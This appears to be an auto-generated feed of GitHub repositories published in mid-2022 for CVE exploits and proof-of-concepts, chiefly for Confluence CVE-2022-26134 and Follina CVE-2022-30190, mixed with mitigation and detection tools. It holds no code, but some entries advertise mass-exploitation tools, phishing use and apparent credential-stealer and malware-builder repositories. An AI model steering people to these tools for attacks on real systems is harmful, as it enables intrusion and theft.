**no description** : [e4r23fd/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/e4r23fd/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-06-04T11:44:51Z

**CVE-2022-26133 Exploit** : [0xAbbarhSF/CVE-2022-26133](https://github.com/0xAbbarhSF/CVE-2022-26133) create time: 2022-06-04T11:31:48Z

**CVE-2021-3129** : [914525753/Laravel-CVE-2021-3129](https://github.com/914525753/Laravel-CVE-2021-3129) create time: 2022-06-04T10:58:47Z

**Confluence OGNL expression injected RCE(CVE-2022-26134) poc and exp** : [SNCKER/CVE-2022-26134](https://github.com/SNCKER/CVE-2022-26134) create time: 2022-06-04T11:16:28Z

**Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability PoC** : [shamo0/CVE-2022-26134](https://github.com/shamo0/CVE-2022-26134) create time: 2022-06-04T10:44:38Z

**(CVE-2022-26134)an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server** : [Brucetg/CVE-2022-26134](https://github.com/Brucetg/CVE-2022-26134) create time: 2022-06-04T10:27:50Z

**CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15** : [812262605/mai-lang-chain](https://github.com/812262605/mai-lang-chain) create time: 2022-06-04T06:23:52Z

**no description** : [kyxiaxiang/CVE-2022-26134](https://github.com/kyxiaxiang/CVE-2022-26134) create time: 2022-06-04T05:46:48Z

**no description** : [Trhackno/XSS-CVE-2022-30489](https://github.com/Trhackno/XSS-CVE-2022-30489) create time: 2022-06-04T02:31:50Z

**CVE-2021-45022 and CVE-2021-45024** : [cptsticky/xxe-zena](https://github.com/cptsticky/xxe-zena) create time: 2022-06-04T01:46:53Z

**Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote Code Execution (RCE)** : [Nwqda/CVE-2022-26134](https://github.com/Nwqda/CVE-2022-26134) create time: 2022-06-03T21:07:30Z

**no description** : [Trhackno/CVE-2022-26133](https://github.com/Trhackno/CVE-2022-26133) create time: 2022-06-03T19:25:18Z

**CVE-2022-26134 - Confluence Pre-Auth RCE | OGNL injection** : [crowsec-edtech/CVE-2022-26134](https://github.com/crowsec-edtech/CVE-2022-26134) create time: 2022-06-03T19:24:30Z

**no description** : [Trhackno/CVE-2020-29597](https://github.com/Trhackno/CVE-2020-29597) create time: 2022-06-03T19:12:57Z

**CVE-2022-26134 ATLASIAN CONFULENCE UNAUTHETICATED RCE** : [oturu/CVE-2022-26134-POC](https://github.com/oturu/CVE-2022-26134-POC) create time: 2022-06-03T18:32:35Z

**CVE-2022-26134 Proof of Concept** : [jbaines-r7/through_the_wire](https://github.com/jbaines-r7/through_the_wire) create time: 2022-06-03T13:59:19Z

**no description** : [TanmoyG1800/CVE-2021-4034](https://github.com/TanmoyG1800/CVE-2021-4034) create time: 2022-06-03T17:03:44Z

**Generate SSRF payloads** : [MKSx/CVE-2021-22054](https://github.com/MKSx/CVE-2021-22054) create time: 2022-06-03T14:06:02Z

**CVE-2022-26134 an Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134)** : [konjo4/CVE-2022-26134](https://github.com/konjo4/CVE-2022-26134) create time: 2022-06-03T14:12:58Z

**no description** : [e4r23fd/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/e4r23fd/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-06-03T14:09:22Z

**no description** : [th3b3ginn3r/CVE-2022-26134-Exploit-Detection-on-Linux](https://github.com/th3b3ginn3r/CVE-2022-26134-Exploit-Detection-on-Linux) create time: 2022-06-03T13:52:14Z

**0-DAY: Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134).** : [cve-hunter/CVE-2022-26134](https://github.com/cve-hunter/CVE-2022-26134) create time: 2022-06-03T13:42:32Z

**Spring exploit (LIMITED COPIES)** : [Expl0desploit/CVE-2022-22965](https://github.com/Expl0desploit/CVE-2022-22965) create time: 2022-06-03T12:56:08Z

**no description** : [e4r23fd/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/e4r23fd/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-06-03T12:53:14Z

**CVE-2022-26134 vuln domains** : [s0rtega/CVE-2022-26134_vuln](https://github.com/s0rtega/CVE-2022-26134_vuln) create time: 2022-06-03T10:38:51Z

**0-DAY: Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134).** : [CyberDonkyx0/CVE-2022-26134](https://github.com/CyberDonkyx0/CVE-2022-26134) create time: 2022-06-03T09:30:51Z

**VMware Workspace ONE Access and Identity Manager RCE via SSTI. CVE-2022-22954 - PoC SSTI * exploit+payload+shodan (ну набором)** : [badboy-sft/CVE-2022-22954](https://github.com/badboy-sft/CVE-2022-22954) create time: 2022-06-03T09:17:12Z

**no description** : [orwagodfather/CVE-2022-22954](https://github.com/orwagodfather/CVE-2022-22954) create time: 2022-06-03T08:51:44Z

**Information and scripts for the confluence CVE-2022-26134** : [offlinehoster/CVE-2022-26134](https://github.com/offlinehoster/CVE-2022-26134) create time: 2022-06-03T08:01:49Z

**Follina POC by John Hammond** : [SrikeshMaharaj/CVE-2022-30190](https://github.com/SrikeshMaharaj/CVE-2022-30190) create time: 2022-06-03T08:00:01Z

**Powershell script to mitigate cve-2022-30190** : [hilt86/cve-2022-30190-mitigate](https://github.com/hilt86/cve-2022-30190-mitigate) create time: 2022-06-03T06:54:35Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004) create time: 2022-06-03T06:24:34Z

**Microsoft's recommended mitigation for CVE-2022-30190 using Powershell** : [hilt86/cve-2022-30190-mitigate](https://github.com/hilt86/cve-2022-30190-mitigate) create time: 2022-06-03T06:03:15Z

**This is to patch CVE-2022-30190. Use at your own risk.** : [droidrzrlover/CVE-2022-30190](https://github.com/droidrzrlover/CVE-2022-30190) create time: 2022-06-03T05:52:36Z

**Fidelis Network and Deception - Insecure File Permissions Privilege Escalation** : [henryreed/CVE-2022-0997](https://github.com/henryreed/CVE-2022-0997) create time: 2022-06-03T05:46:10Z

**Fidelis Network and Deception - Insecure File Permissions Privilege Escalation - Multiple** : [henryreed/CVE-2022-0486](https://github.com/henryreed/CVE-2022-0486) create time: 2022-06-03T05:06:52Z

**Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor** : [NullBrunk/CVE-2022-1609](https://github.com/NullBrunk/CVE-2022-1609) create time: 2022-06-03T02:49:49Z

**Python exploit for CVE-2011-2523** : [NullBrunk/CVE-2011-2523](https://github.com/NullBrunk/CVE-2011-2523) create time: 2022-06-03T00:17:18Z

**All about CVE-2022-30190, aka follina, that is a RCE vulnerability that affects Microsoft Support Diagnostic Tools (MSDT) on Office apps such as Word. This is a very simple POC, feel free to check the sources below for more threat intelligence.** : [Noxtal/follina](https://github.com/Noxtal/follina) create time: 2022-06-03T00:25:37Z

**no description** : [trhacknon/exploit-CVE-2014-6271](https://github.com/trhacknon/exploit-CVE-2014-6271) create time: 2022-06-02T21:52:52Z

**no description** : [trhacknon/CVE-2014-6271](https://github.com/trhacknon/CVE-2014-6271) create time: 2022-06-02T21:33:59Z

**CVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities** : [Kesinger57/CVE-2022-30190-mass-rce](https://github.com/Kesinger57/CVE-2022-30190-mass-rce) create time: 2022-06-02T17:28:27Z

**no description** : [arozx/CVE-2022-30910](https://github.com/arozx/CVE-2022-30910) create time: 2022-06-02T16:14:13Z

**CVE-2022-30190 | MS-MSDT Follina One Click** : [AchocolatechipPancake/MS-MSDT-Office-RCE-Follina](https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina) create time: 2022-06-02T16:09:02Z

**no description** : [intentagmbh/cve_2022-30190](https://github.com/intentagmbh/cve_2022-30190) create time: 2022-06-02T15:40:10Z

**Simple Follina poc exploit** : [WesyHub/CVE-2022-30190---Follina---Poc-Exploit](https://github.com/WesyHub/CVE-2022-30190---Follina---Poc-Exploit) create time: 2022-06-02T15:39:20Z

**PDQ Package I created for CVE-2022-30190** : [castlesmadeofsand/ms-msdt-vulnerability-pdq-package](https://github.com/castlesmadeofsand/ms-msdt-vulnerability-pdq-package) create time: 2022-06-02T15:33:15Z

**CVE-2020-2551 Exploiter** : [0xAbbarhSF/CVE-Exploit](https://github.com/0xAbbarhSF/CVE-Exploit) create time: 2022-06-02T14:20:43Z

**The CVE-2022-30190-follina Workarounds Patch** : [suegdu/CVE-2022-30190-Follina-Patch](https://github.com/suegdu/CVE-2022-30190-Follina-Patch) create time: 2022-06-02T13:43:20Z

**A proof of concept of an SEH overflow with arbitrary dll injection** : [lem0nSec/CVE-2010-5301](https://github.com/lem0nSec/CVE-2010-5301) create time: 2022-06-01T22:12:07Z

**no description** : [tjcim/cve-2018-6574](https://github.com/tjcim/cve-2018-6574) create time: 2022-06-02T12:52:56Z

**no description** : [aabbcc19191/CVE-2020-13935](https://github.com/aabbcc19191/CVE-2020-13935) create time: 2022-06-02T13:21:25Z

**no description** : [swaiist/CVE-2022-30190-Fix](https://github.com/swaiist/CVE-2022-30190-Fix) create time: 2022-06-02T13:01:46Z

**no description** : [gyaansastra/CVE-2022-30190](https://github.com/gyaansastra/CVE-2022-30190) create time: 2022-06-02T12:58:24Z

**no description** : [tjcim/cve-2018-6574-1](https://github.com/tjcim/cve-2018-6574-1) create time: 2022-06-02T12:35:08Z

**no description** : [gyaansastra/CVE2022-30190](https://github.com/gyaansastra/CVE2022-30190) create time: 2022-06-02T12:44:02Z

**CVE-2022-30190-follina.py-修改版,可以自定义word模板,方便实战中钓鱼使用。** : [komomon/CVE-2022-30190-follina-Office-MSDT-Fixed](https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed) create time: 2022-06-02T12:33:18Z

**Mitigates the "Folina"-ZeroDay (CVE-2022-30190)** : [derco0n/mitigate-folina](https://github.com/derco0n/mitigate-folina) create time: 2022-06-02T09:30:13Z

**Bai cuoi ky CVE-2022-24644** : [ThanhThuy2908/ATHDH_CVE_2022_24644](https://github.com/ThanhThuy2908/ATHDH_CVE_2022_24644) create time: 2022-06-02T07:32:15Z

**no description** : [ITMarcin2211/CVE-2022-30190](https://github.com/ITMarcin2211/CVE-2022-30190) create time: 2022-06-02T07:01:19Z

**A tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)** : [ErrorNoInternet/FollinaScanner](https://github.com/ErrorNoInternet/FollinaScanner) create time: 2022-06-02T06:45:19Z

**no description** : [trhacknon/CVE-2021-35064](https://github.com/trhacknon/CVE-2021-35064) create time: 2022-06-02T03:07:40Z

**Python script to exploit CVE-2021-35064 and CVE-2021-36356** : [Chocapikk/CVE-2021-35064](https://github.com/Chocapikk/CVE-2021-35064) create time: 2022-06-02T02:19:49Z

**MSDT protocol disabler (CVE-2022-30190 patch tool)** : [gamingwithevets/msdt-disable](https://github.com/gamingwithevets/msdt-disable) create time: 2022-06-02T02:47:34Z

**no description** : [trhacknon/CVE-2022-22954](https://github.com/trhacknon/CVE-2022-22954) create time: 2022-06-02T01:44:07Z

**MS-MSDT Follina CVE-2022-30190 PoC document generator** : [sudoaza/CVE-2022-30190](https://github.com/sudoaza/CVE-2022-30190) create time: 2022-06-01T23:27:14Z

**Proof of Concept zu MSDT-Follina - CVE-2022-30190. ÜBERPRÜFUNG DER WIRKSAMKEIT VON MICROSOFT DEFNEDER IN DER JEWEILS AKTUELLSTEN WINDOWS 10 VERSION.** : [ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190](https://github.com/ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190) create time: 2022-06-01T23:07:26Z

**CVE-2022-30190 or "Follina" 0day proof of concept** : [rayorole/CVE-2022-30190](https://github.com/rayorole/CVE-2022-30190) create time: 2022-06-01T21:33:18Z

**Exploit to trigger RCE for CVE-2018-16763 on FuelCMS <= 1.4.1 and interactive shell.** : [p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE) create time: 2022-05-31T15:31:37Z

**no description** : [trhacknon/CVE-2019-16759](https://github.com/trhacknon/CVE-2019-16759) create time: 2022-06-01T20:28:43Z

**Removes the ability for MSDT to run, in response to CVE-2022-30190 (Follina)** : [Cosmo121/Follina-Remediation](https://github.com/Cosmo121/Follina-Remediation) create time: 2022-06-01T20:26:56Z

**Python script to exploit CVE-2022-22954 and then exploit CVE-2022-22960** : [Chocapikk/CVE-2022-22954](https://github.com/Chocapikk/CVE-2022-22954) create time: 2022-06-01T19:33:32Z

**An NSIS script that helps deploy and roll back the mitigation registry patch for CVE-2022-30190 as recommended by Microsoft** : [rouben/CVE-2022-30190-NSIS](https://github.com/rouben/CVE-2022-30190-NSIS) create time: 2022-06-01T18:58:07Z

**no description** : [trhacknon/CVE-2022-22954-PoC](https://github.com/trhacknon/CVE-2022-22954-PoC) create time: 2022-06-01T18:33:45Z

**no description** : [Vaisakhkm2625/MSDT-0-Day-CVE-2022-30190-Poc](https://github.com/Vaisakhkm2625/MSDT-0-Day-CVE-2022-30190-Poc) create time: 2022-06-01T16:11:33Z

**no description** : [mitespsoc/CVE-2022-30190-POC](https://github.com/mitespsoc/CVE-2022-30190-POC) create time: 2022-06-01T14:55:43Z

**no description** : [Kyleifpossible/CVE202230190test1](https://github.com/Kyleifpossible/CVE202230190test1) create time: 2022-06-01T14:24:00Z

**no description** : [Kyleifpossible/CVE202230190test0](https://github.com/Kyleifpossible/CVE202230190test0) create time: 2021-12-04T06:58:57Z

**Just another PoC for the new MSDT-Exploit** : [drgreenthumb93/CVE-2022-30190-follina](https://github.com/drgreenthumb93/CVE-2022-30190-follina) create time: 2022-06-01T11:37:08Z

**no description** : [hscorpion/CVE-2022-30190](https://github.com/hscorpion/CVE-2022-30190) create time: 2022-06-01T10:13:16Z

**no description** : [Icare1337/CVE-2022-30190](https://github.com/Icare1337/CVE-2022-30190) create time: 2022-06-01T09:25:24Z

**CVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities** : [Kesinger57/CVE-2022-30190-mass](https://github.com/Kesinger57/CVE-2022-30190-mass) create time: 2022-06-01T09:19:34Z

**Follina MS-MSDT 0-day MS Office RCE (CVE-2022-30190) PoC in Go** : [dwisiswant0/gollina](https://github.com/dwisiswant0/gollina) create time: 2022-06-01T09:02:00Z

**no description** : [gerr-re/cve-2022-27438](https://github.com/gerr-re/cve-2022-27438) create time: 2022-06-01T08:33:16Z

**Phone number notification bug** : [fordsham/CVE-2021-30956](https://github.com/fordsham/CVE-2021-30956) create time: 2022-06-01T07:09:18Z

**no description** : [Ran-Xing/cve-2022-193372](https://github.com/Ran-Xing/cve-2022-193372) create time: 2022-06-01T05:32:09Z

**MSDT 0-Day Mass Exploitation Tool** : [ExploitPwner/CVE-2022-30190](https://github.com/ExploitPwner/CVE-2022-30190) create time: 2022-06-01T04:15:25Z

**no description** : [trhacknon/CVE-2022-29303](https://github.com/trhacknon/CVE-2022-29303) create time: 2022-05-31T23:40:18Z

**CVE-2022-30190 remediation via removal of ms-msdt from Windows registry** : [PaddlingCode/cve-2022-30190](https://github.com/PaddlingCode/cve-2022-30190) create time: 2022-05-31T23:32:33Z

**Python script to exploit CVE-2022-29303** : [Chocapikk/CVE-2022-29303](https://github.com/Chocapikk/CVE-2022-29303) create time: 2022-05-31T22:55:05Z

**

Node

** : [Mouhamedtec/CVE-2022-1192](https://github.com/Mouhamedtec/CVE-2022-1192) create time: 2022-05-31T20:38:06Z

**no description** : [mghostz/CVE202230190](https://github.com/mghostz/CVE202230190) create time: 2022-05-31T20:24:44Z

**A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.** : [sentinelblue/CVE-2022-30190](https://github.com/sentinelblue/CVE-2022-30190) create time: 2022-05-31T18:00:42Z

**no description** : [trhacknon/CVE-2022-30190](https://github.com/trhacknon/CVE-2022-30190) create time: 2022-05-31T18:58:55Z

**no description** : [aymankhder/MSDT_CVE-2022-30190-follina-](https://github.com/aymankhder/MSDT_CVE-2022-30190-follina-) create time: 2022-05-31T18:45:34Z

**no description** : [trhacknon/CVE-2022-30190](https://github.com/trhacknon/CVE-2022-30190) create time: 2022-05-31T18:21:30Z

**CVE-2022-30190- A Zero-Click RCE Vulnerability In MSDT** : [kdk2933/msdt-follina-office](https://github.com/kdk2933/msdt-follina-office) create time: 2022-05-31T17:54:20Z

**Picking up processes that have triggered ASR related to CVE-2022-30190** : [DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup](https://github.com/DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup) create time: 2022-05-31T16:11:14Z

**Aka Follina = benign POC.** : [rickhenderson/cve-2022-30190](https://github.com/rickhenderson/cve-2022-30190) create time: 2022-05-31T14:50:55Z

**This Repository Talks about the Follina MSDT from Defender Perspective** : [archanchoudhury/MSDT_CVE-2022-30190](https://github.com/archanchoudhury/MSDT_CVE-2022-30190) create time: 2022-05-31T14:10:11Z

**no description** : [anniehelkekpl92/CVE-2022](https://github.com/anniehelkekpl92/CVE-2022) create time: 2022-05-31T12:38:16Z

**Microsoft Office Word Rce 复现(CVE-2022-30190)** : [bytecaps/CVE-2022-30190](https://github.com/bytecaps/CVE-2022-30190) create time: 2022-05-31T12:15:18Z

**no description** : [Exzh34/PentestLab-CVE-2018-6574-go-get-RCE](https://github.com/Exzh34/PentestLab-CVE-2018-6574-go-get-RCE) create time: 2022-05-31T11:17:51Z

**no description** : [JCPpeiqi/-cve-2021-46381](https://github.com/JCPpeiqi/-cve-2021-46381) create time: 2022-05-31T10:54:40Z

**CVE-2022-30190 Follina POC** : [onecloudemoji/CVE-2022-30190](https://github.com/onecloudemoji/CVE-2022-30190) create time: 2022-05-31T06:45:25Z

**no description** : [JMousqueton/PoC-CVE-2022-30190](https://github.com/JMousqueton/PoC-CVE-2022-30190) create time: 2022-05-30T18:17:38Z

**no description** : [tuannq2299/CVE-2019-8942](https://github.com/tuannq2299/CVE-2019-8942) create time: 2022-05-31T03:28:22Z

**Exploit for Apache 2.4.50 (CVE-2021-42013)** : [viliuspovilaika/cve-2021-42013](https://github.com/viliuspovilaika/cve-2021-42013) create time: 2022-05-31T03:28:20Z

**no description** : [tuannq2299/CVE-2021-43408](https://github.com/tuannq2299/CVE-2021-43408) create time: 2022-05-31T03:00:27Z

**CVE-2022-22978 Spring-Security bypass Demo** : [DeEpinGh0st/CVE-2022-22978](https://github.com/DeEpinGh0st/CVE-2022-22978) create time: 2022-05-31T03:14:55Z

**CVE-2022-1292 OpenSSL c_rehash Vulnerability** : [rama291041610/CVE-2022-1292](https://github.com/rama291041610/CVE-2022-1292) create time: 2022-05-30T16:59:54Z

**no description** : [SenpaiX00/CVE-05-2022-0438](https://github.com/SenpaiX00/CVE-05-2022-0438) create time: 2022-05-30T15:41:44Z

**CVE-2022-1292 OpenSSL c_rehash Vulnerability** : [alcaparra/CVE-2022-1292](https://github.com/alcaparra/CVE-2022-1292) create time: 2022-05-30T14:45:15Z

**WPQA < 5.5 - Unauthenticated Private Message Disclosure** : [V35HR4J/CVE-2022-1598](https://github.com/V35HR4J/CVE-2022-1598) create time: 2022-05-30T10:54:19Z

**no description** : [Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589) create time: 2022-05-30T08:41:07Z

**no description** : [Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589) create time: 2022-05-30T07:49:14Z

**CVE-2022-24086 and CVE-2022-24087 are an rce in adobe commerce and magento** : [TomArni680/CVE-2022-24086-MASS-RCE](https://github.com/TomArni680/CVE-2022-24086-MASS-RCE) create time: 2022-05-30T07:08:41Z

**Exploit CVE-2021-24160** : [hnthuan1998/Exploit-CVE-2021-24160](https://github.com/hnthuan1998/Exploit-CVE-2021-24160) create time: 2022-05-30T01:48:27Z

**no description** : [hnthuan1998/CVE-2021-24160](https://github.com/hnthuan1998/CVE-2021-24160) create time: 2022-05-30T01:46:50Z

**no description** : [SecurityBoi/TEST-CVE-05-2022-0438](https://github.com/SecurityBoi/TEST-CVE-05-2022-0438) create time: 2022-05-29T18:05:30Z

**exploit is already public** : [TomArni680/CVE-2022-1388-RCE](https://github.com/TomArni680/CVE-2022-1388-RCE) create time: 2022-05-29T15:29:44Z

**CVE-2022-26809 | is a remote code execution vulnerablity in rpc runtime and affects a wide versions of windows** : [seciurdt/CVE-2022-26809-MASS-RCE](https://github.com/seciurdt/CVE-2022-26809-MASS-RCE) create time: 2022-05-29T14:58:52Z

**no description** : [Wrong-pixel/CVE-2022-22947-exp](https://github.com/Wrong-pixel/CVE-2022-22947-exp) create time: 2022-05-29T01:07:26Z

**vmware authentication bypass** : [Dghpi9/CVE-2022-22972](https://github.com/Dghpi9/CVE-2022-22972) create time: 2022-05-28T20:56:09Z

**CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合** : [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC) create time: 2022-05-28T13:30:22Z

**Mass RCE VIA CVE-2022-6809 AND THE METASPLOIT MODULE** : [ChrisopherJohanso/CVE-2022-26809-RCE](https://github.com/ChrisopherJohanso/CVE-2022-26809-RCE) create time: 2022-05-28T13:52:35Z

**no description** : [trhacknon/CVE-2022-1388-PocExp](https://github.com/trhacknon/CVE-2022-1388-PocExp) create time: 2022-05-28T12:46:08Z

**no description** : [trhacknon/Exploit-F5-CVE-2022-1388](https://github.com/trhacknon/Exploit-F5-CVE-2022-1388) create time: 2022-05-28T12:43:18Z

**no description** : [trhacknon/F5-CVE-2022-1388-Exploit](https://github.com/trhacknon/F5-CVE-2022-1388-Exploit) create time: 2022-05-28T12:40:56Z

**no description** : [trhacknon/CVE-2022-1388](https://github.com/trhacknon/CVE-2022-1388) create time: 2022-05-28T12:35:59Z

**Wordpress 5.8.2 CVE-2022-21661 Vuln enviroment POC exploit** : [0x4E0x650x6F/Wordpress-cve-CVE-2022-21661](https://github.com/0x4E0x650x6F/Wordpress-cve-CVE-2022-21661) create time: 2022-05-28T10:46:48Z

**no description** : [west9b/CVE-2022-30525](https://github.com/west9b/CVE-2022-30525) create time: 2022-05-28T07:19:31Z

**no description** : [kuznyJan1972/CVE-2022-23121-MASS-RCE](https://github.com/kuznyJan1972/CVE-2022-23121-MASS-RCE) create time: 2022-05-28T05:48:35Z

**FreePascal implementation of the UnrealIRCD CVE-2010-2075** : [MFernstrom/Offensive-Pascal-CVE-2010-2075](https://github.com/MFernstrom/Offensive-Pascal-CVE-2010-2075) create time: 2022-05-28T02:47:22Z

**FreePascal implementation of CVE-2011-2523** : [MFernstrom/OffensivePascal-CVE-2011-2523](https://github.com/MFernstrom/OffensivePascal-CVE-2011-2523) create time: 2022-05-27T20:47:01Z

**CVE-2019-9729. Transferred from https://github.com/DoubleLabyrinth/SdoKeyCrypt-sys-local-privilege-elevation** : [recozone/HyperSine](https://github.com/recozone/HyperSine) create time: 2022-05-27T15:34:39Z

**no description** : [jftierno/CVE-2018-6574-2](https://github.com/jftierno/CVE-2018-6574-2) create time: 2022-05-27T15:10:11Z

**Exploit for Pentester Labs** : [Cypheer/exploit_CVE-2018-6574](https://github.com/Cypheer/exploit_CVE-2018-6574) create time: 2022-05-27T14:35:11Z

**CVE-2022-1609 WordPress Weblizar后门** : [savior-only/CVE-2022-1609](https://github.com/savior-only/CVE-2022-1609) create time: 2022-05-27T13:15:38Z

**CVE-2018-17456复现** : [jiahuiLeee/test](https://github.com/jiahuiLeee/test) create time: 2022-05-27T11:56:07Z

**A PoC / methodology to exploit CVE-2017-6516** : [Rubytox/CVE-2017-6516-mcsiwrapper-](https://github.com/Rubytox/CVE-2017-6516-mcsiwrapper-) create time: 2022-05-27T10:24:41Z

**no description** : [pthlong9991/CVE202228346](https://github.com/pthlong9991/CVE202228346) create time: 2022-05-27T10:08:55Z

**CVE-2022-24494** : [vportal/AFD](https://github.com/vportal/AFD) create time: 2022-05-27T09:52:52Z

**exploit for T3 rce (CVE 2015-4852 \CVE 2016-0638 \CVE 2016-3510)** : [minhangxiaohui/Weblogic_direct_T3_Rces](https://github.com/minhangxiaohui/Weblogic_direct_T3_Rces) create time: 2022-05-27T08:04:24Z

**no description** : [trhacknon/CVE-2022-29464-mass](https://github.com/trhacknon/CVE-2022-29464-mass) create time: 2022-05-26T22:02:45Z

**Python script to exploit CVE-2022-29464 (mass mode)** : [Chocapikk/CVE-2022-29464](https://github.com/Chocapikk/CVE-2022-29464) create time: 2022-05-26T20:19:53Z

**.json and .yaml files used to exploit CVE-2018-25031** : [afine-com/CVE-2018-25031](https://github.com/afine-com/CVE-2018-25031) create time: 2022-05-26T19:06:21Z

**APOLOGEE is a Python script and Metasploit module that enumerates a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers (all versions prior to V3.5) and TALON TC BACnet Automation Controllers (all versions prior to V3.5). With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or channel to access hidden directories in the web server. This repository takes advantage of CVE-2017-9947.** : [RoseSecurity/APOLOGEE](https://github.com/RoseSecurity/APOLOGEE) create time: 2022-05-26T01:13:42Z

**no description** : [horizon3ai/CVE-2022-22972](https://github.com/horizon3ai/CVE-2022-22972) create time: 2022-05-24T20:19:55Z

**no description** : [gog1071/Spring4Shell-CVE-2022-22965](https://github.com/gog1071/Spring4Shell-CVE-2022-22965) create time: 2022-05-26T11:39:25Z

**no description** : [trhacknon/CVE-2019-15107](https://github.com/trhacknon/CVE-2019-15107) create time: 2022-05-26T04:57:40Z

**no description** : [trhacknon/CVE-2019-15642](https://github.com/trhacknon/CVE-2019-15642) create time: 2022-05-26T04:30:14Z

**sudo提权漏洞CVE-2021-3156复现代码** : [q77190858/CVE-2021-3156](https://github.com/q77190858/CVE-2021-3156) create time: 2022-05-26T02:47:53Z

**Implementation of CVE-2018-6242 (AKA Fusée Gelée, AKA shofel2)** : [Swiftloke/fusee-toy](https://github.com/Swiftloke/fusee-toy) create time: 2022-05-25T19:51:06Z

**School Dormitory Management System 1.0 - Reflected XSS** : [bigzooooz/CVE-2022-30513](https://github.com/bigzooooz/CVE-2022-30513) create time: 2022-05-25T16:46:09Z

**School Dormitory Management System 1.0 - Reflected XSS** : [bigzooooz/CVE-2022-30514](https://github.com/bigzooooz/CVE-2022-30514) create time: 2022-05-25T16:42:25Z

**School Dormitory Management System 1.0 - Unauthenticated SQL Injection** : [bigzooooz/CVE-2022-30511](https://github.com/bigzooooz/CVE-2022-30511) create time: 2022-05-25T16:35:06Z

**School Dormitory Management System 1.0 - Unauthenticated SQL Injection** : [bigzooooz/CVE-2022-30510](https://github.com/bigzooooz/CVE-2022-30510) create time: 2022-05-25T16:32:18Z

**School Dormitory Management System 1.0 - Unauthenticated SQL Injection** : [bigzooooz/CVE-2022-30512](https://github.com/bigzooooz/CVE-2022-30512) create time: 2022-05-25T16:23:53Z

**C-DATA FD702XW-X-R430 v2.1.13_X001 was discovered to contain a command injection vulnerability via the va_cmd parameter in formlanipv6. This vulnerability allows attackers to execute arbitrary commands via a crafted HTTP request.** : [exploitwritter/CVE-2022-29337](https://github.com/exploitwritter/CVE-2022-29337) create time: 2022-05-25T13:02:34Z

**Atlassian Jira Seraph Authentication Bypass RCE(CVE-2022-0540)** : [Pear1y/CVE-2022-0540-Preauth-RCE](https://github.com/Pear1y/CVE-2022-0540-Preauth-RCE) create time: 2022-05-25T10:47:04Z

**no description** : [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219) create time: 2022-05-25T10:01:58Z

**no description** : [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one) create time: 2022-05-25T09:54:40Z

**no description** : [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old) create time: 2022-05-25T09:31:03Z

**no description** : [Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-](https://github.com/Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-) create time: 2022-05-25T09:03:48Z

**no description** : [Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308](https://github.com/Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308) create time: 2022-05-25T06:50:30Z

**no description** : [trhacknon/CVE-2022-1292](https://github.com/trhacknon/CVE-2022-1292) create time: 2022-05-25T07:06:48Z

**CVE-2022-29221 Proof of Concept Code** : [sbani/CVE-2022-29221-PoC](https://github.com/sbani/CVE-2022-29221-PoC) create time: 2022-05-25T06:02:23Z

**Csrf file upload insecure** : [trhacknon/CVE-2020-29597](https://github.com/trhacknon/CVE-2020-29597) create time: 2022-05-25T01:10:01Z

**no description** : [yuuki1967/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/yuuki1967/CVE-2021-44228-Apache-Log4j-Rce) create time: 2022-05-25T01:56:14Z

